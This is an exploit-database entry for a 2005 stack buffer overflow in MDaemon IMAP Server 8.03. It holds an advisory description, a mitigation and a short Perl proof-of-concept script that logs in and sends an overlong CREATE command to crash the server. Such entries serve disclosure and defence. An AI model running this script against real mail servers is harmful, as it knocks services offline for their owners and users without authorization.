MDAEMON stack based buffer overflow

vendor:

MDaemon IMAP Server

by:

kcope

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: MDaemon IMAP Server

Affected Version From: 08.03

Affected Version To: 08.03

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

MDAEMON stack based buffer overflow

Alt-N MDaemon IMAP Server is affected by a remote buffer overflow vulnerability. This issue presents itself when an attacker submits excessive data through the CREATE command subsequent to authentication. This vulnerability may be leveraged to execute arbitrary code in the context of the server, facilitating unauthorized access to the affected computer.

Mitigation:

Upgrade to the latest version of Alt-N MDaemon IMAP Server

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14315/info

Alt-N MDaemon IMAP Server is affected by a remote buffer overflow vulnerability.

This issue presents itself when an attacker submits excessive data through the CREATE command subsequent to authentication

This vulnerability may be leveraged to execute arbitrary code in the context of the server, facilitating unauthorized access to the affected computer.

Alt-N MDaemon 8.03 is reported to be vulnerable. Other versions are likely affected as well. 

### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                             PeerPort => '143',
                             Proto    => 'tcp');

$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;

print $sock "a001 LOGIN username password\r\n";
print $sock "a001 CREATE $a\r\n";

while (<$sock>) {
   print $_;
}